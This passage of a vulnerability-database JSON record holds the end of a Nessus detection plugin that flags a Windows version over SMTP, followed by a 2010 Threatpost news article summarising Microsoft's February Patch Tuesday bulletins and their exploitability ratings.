value:\"CVE-2008-4038\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 20, 94, 119, 189, 255, 264, 287, 310, 362, 399);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smtp_ntlm_info.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"Settings/PCI_DSS\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\ninclude(\"audit.inc\");\n\nif (!get_kb_item(\"Settings/PCI_DSS\"))\n{\n audit(AUDIT_PCI);\n}\n\nif (report_paranoia < 2)\n{\n audit(AUDIT_PARANOID);\n}\n\nport = get_kb_item_or_exit(\"Services/smtp\");\nos_version = get_kb_item_or_exit(\"smtp/\"+port+\"/ntlm/host/os_version\");\nif (os_version != \"6.0.6001\")\n{\n audit(AUDIT_OS_SP_NOT_VULN);\n}\n\nsecurity_report_v4(severity:SECURITY_HOLE, port:port);\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T23:08:33", "bulletinFamily": "info", "description": "[](<https://threatpost.com/ms-patch-tuesday-13-bulletins-26-vulnerabilities-020910/>)Microsoft today released 13 security bulletins with fixes for 26 vulnerabilities affecting Windows and Office users and warned customers to pay special attention to a slew of flaws that can be trivially exploited by malware miscreants.\n\nThe company urged customers to prioritize and deploy four updates because of the \u201ccritical\u201d severity rating and the fact that \u201cconsistent exploit code\u201d is likely within the next 30 days.\n\nHere\u2019s the [skinny](<http://blogs.technet.com/msrc/archive/2010/02/09/february-2010-security-bulletin-release.aspx>) on the three updates that should be applied immediately: \n\n * [MS10-013](<http://www.microsoft.com/technet/security/Bulletin/MS10-013.mspx>): Addresses a Critical vulnerability in DirectShow, should be at the top of your list for testing and deployment. This issue is Critical on all supported versions of Windows except Itanium based server products and has an Exploitability Index rating of 1. To exploit the vulnerability, an attacker could host a malicious AVI file on a website and convince a user to visit the site, or send the file via email and convince the a user to open it.\n * [MS10-006](<http://www.microsoft.com/technet/security/Bulletin/MS10-006.mspx>): This is also rated Critical on all versions of Windows, except Windows Vista and Windows Server 2008, and addresses 2 vulnerabilities in SMB Client. One of the vulnerabilities has an Exploitability Index rating of 1. In the simplest scenario, a system connecting to a network file share is an SMB Client. The issue occurs during the client/server negotiation phase of the connection. In order to exploit this issue, an attacker would need to host a malicious server and convince a client system to connect to it. An attacker could also try to perform a man-in-the-middle attack by responding to SMB requests from clients. From our analysis of this issue, we expect attempts to exploit it would be more likely to result in a Denial of Service than in Remote Code Execution.\n * [MS10-007](<http://www.microsoft.com/technet/security/Bulletin/MS10-007.mspx>): Fixes a Critical vulnerability in Windows Shell Handler that affects Windows 2000, Windows XP, and Windows Server 2003. The attack vector is through a specially crafted link that appears to the ShellExecute API to be a valid link. This issue has not been publicly exposed but we give it an Exploitability Index rating of 1, so we urge customers on affected platforms to install it as soon as possible.\n\nA fourth bulletin \u2014 [MS10-008](<http://www.microsoft.com/technet/security/Bulletin/MS10-008.mspx>) \u2014 includes ActiveX Kill Bits for Internet Explorer and should also be treated with the utmost priority because it exposes surfers to malicious code execution attacks.\n\nEleven of 13 bulletins affect the Windows operating system while two affect older versions of Microsoft Office.\n\nThis chart from Microsoft\u2019s [Security Research & Defense Blog](<http://blogs.technet.com/srd/archive/2010/02/09/assessing-the-risk-of-the-february-security-bulletins.aspx>) provides useful information to help assess the risks associated with these vulnerabilities: \n\n**Bulletin** | \n\nMost likely attack vector\n\n| \n\nMax Bulletin Severity\n\n| \n\nMax Exploit- ability Index\n\n| \n\nLikely first 30 days impact\n\n| \n\nPlatform mitigations \n \n---|---|---|---|---|--- \n \n[MS10-013](<http://www.microsoft.com/technet/security/bulletin/MS10-013.mspx>)\n\n(Quartz)\n\n| \n\nVictim opens malicious AVI or WAV file.\n\n| \n\nCritical\n\n| \n\n1\n\n| \n\nLikely to see working exploit in next 30 days.\n\n| \n \n[MS10-007](<http://www.microsoft.com/technet/security/bulletin/MS10-007.mspx>)\n\n(ShellExecute)\n\n| \n\nAttacker hosts a malicious webpage, lures victim to it.\n\n| \n\nCritical\n\n| \n\n1\n\n| \n\nLikely to see exploit code released resulting in binary on WebDAV share being executed.\n\nFor more detail, see this [SRD blog post](<http://blogs.technet.com/srd/archive/2010/02/09/ms10-007-additional-information-and-recommendations-for-developers.aspx>).\n\n| \n \n[MS10-006](<http://www.microsoft.com/technet/security/bulletin/MS10-006.mspx>)\n\n(SMB Client)\n\n| \n\nLocally logged-in attacker with low privilege runs a malicious executable to elevate to high privilege.\n\n| \n\nCritical\n\n| \n\n1\n\n| \n\nLikely to see \nworking exploit code for local attacker escalation.\n\nFor more detail, see this [SRD blog post](<http://blogs.technet.com/srd/archive/2010/02/09/ms10-006-and-ms10-012-smb-security-bulletins.aspx>).\n\n| \n \n[MS10-008](<http://www.microsoft.com/technet/security/bulletin/MS10-001.mspx>)\n\n(ActiveX kill-bits)\n\n| \n\nAttackers host a malicious webpage, lures victim to it\n\n| \n\nCritical\n\n| \n\n2\n\n| \n\nLikely to see working exploit for vulnerabilities in third party ActiveX controls.\n\n| \n \n[MS10-012](<http://www.microsoft.com/technet/security/bulletin/MS10-012.mspx>)\n\n(SMB Server)\n\n| \n\nAttacker sends network-based malicious connection to remote Windows machine via SMB.\n\n| \n\nImportant\n\n| \n\n1\n\n| \n\nLikely to see working proof-of-concept in next 30 days for CVE-2010-0231 resulting in attacker \n \nluring remote victim user to open file on attacker server and \ninitiating a connection back to machine where remote victim is logged \non. \n\n\nLess \nlikely to see working exploit code for the authenticated code execution \nvulnerability (CVE-2010-0020) or unauthenticated denial-of-service \nvulnerabilities (CVE-2010-0021 and 0022)\n\nFor more detail, see this [SRD blog post](<http://blogs.technet.com/srd/archive/2010/02/09/ms10-006-and-ms10-012-smb-security-bulletins.aspx>).\n\n| \n \n[MS10-015](<http://www.microsoft.com/technet/security/bulletin/MS10-015.mspx>)\n\n(Kernel)\n\n| \n\nAttacker already able to execute code as low-privileged user escalates privileges.\n\n| \n\nImportant\n\n| \n\n1\n\n| \n\nProof of concept code already widely available. No active attacks.\n\n| \n \n[MS10-011](<http://www.microsoft.com/technet/security/bulletin/MS10-011.mspx>)\n\n(CSRSS)\n\n| \n\nAttacker \nwho logs onto console of system where victim later logs onto console of \nsame system can potentially run code with victim\u2019s identity.\n\n| \n\nImportant\n\n| \n\n1\n\n| \n\nLikely to see \nproof-of-concept code published for this vulnerability. However, \nunlikely to see wide-spread exploitation due to extensive user \ninteraction required.\n\n| \n \n[MS10-009](<http://www.microsoft.com/technet/security/bulletin/MS10-009.mspx>)\n\n(TCP/IP)\n\n| \n\nAttacker sends network-based attack against system on local subnet.\n\n| \n\nCritical\n\n| \n\n2\n\n| \n\nMay see denial-of-service proof-of-concept \ncode published leveraging CVE-2010-0239 or CVE-2010-0241. Attackers \nare less likely to discover real-world attack surface in next 30 days \nfor CVE-2010-0240.\n\n| \n\n/GS effective mitigation for CVE\u2019s:\n\nCVE-2010-0239\n\nCVE-2010-0240\n\nCVE-2010-0241. \n\n\nCVE-2010-0242 is denial of service only. \n \n[MS10-003](<http://www.microsoft.com/technet/security/bulletin/MS10-003.mspx>)\n\n(Excel)\n\n| \n\nAttack sends malicious .xls file to victim who opens it with Office XP or lower. (Office 2003, 2007 not affected.)\n\n| \n\nImportant\n\n| \n\n1\n\n| \n\nLikely to see working exploit file effective on Office XP in first 30 days.\n\n| \n\nOffice 2003 and Office 2007 not affected. \n \n[MS10-004](<http://www.microsoft.com/technet/security/bulletin/MS10-004.mspx>)\n\n(PowerPoint)\n\n| \n\nAttacks malicious .ppt file to victim who opens it with Powerpoint Viewer 2003.\n\n| \n\nImportant\n\n| \n\n1\n\n| \n\nLikely to see working exploit file effective \non PowerPoint Viewer 2003. However, PowerPoint Viewer 2003 was \nreplaced online by PowerPoint Viewer 2007. Only victims who use\n\n \nPowerPoint Viewer 2003 from Office 2003 install disk would be vulnerable to the PowerPoint Viewer vulnerabilities. \n\n\nLess likely to see working exploit for other PowerPoint vulnerabilities. \n\n\n| \n \n[MS10-010](<http://www.microsoft.com/technet/security/bulletin/MS10-010.mspx>)\n\n(Hyper-V)\n\n| \n\nAttacker running code on virtual machine crashes host OS.\n\n| \n\nImportant\n\n| \n\n3\n\n| \n\nUnlikely to see working exploit code in next 30 days.\n\n| \n \n[MS10-014](<http://www.microsoft.com/technet/security/bulletin/MS10-014.mspx>)\n\n(Kerberos)\n\n| \n\nAttacker potentially able to cause denial of service via \n \nKerberos traffic if victim server configured with trust relationship to MIT Kerberos realm.\n\n| \n\nImportant\n\n| \n\n3\n\n| \n\nUnlikely to see public exploit code \nin next 30 days.\n\n| \n \n[MS10-005](<http://www.microsoft.com/technet/security/bulletin/MS10-005.mspx>)\n\n(GDI+)\n\n| \n\nAttacker sends malicious JPEG to victim. Victim saves JPG, launches mspaint, and then file->opens the malicious JPEG\n\n| \n\nModerate\n\n| \n\n1\n\n| \n\nLikely to see exploit code developed. Unlikely to have broad impact as mspaint is not registered file association for JPEG.\n\n| \n \nMicrosoft also updated the malicious software removal tool to add detections for the Win32/Pushbot malware family.\n", "modified": "2018-08-15T13:30:13", "published": "2010-02-09T19:33:53", "id": "THREATPOST:F9D20D7B330A431D721F16F5223B236A", "href": "https://threatpost.com/ms-patch-tuesday-13-bulletins-26-vulnerabilities-020910/73517/", "type": "threatpost", "title": "MS Patch Tuesday: 13 Bulletins, 26 Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
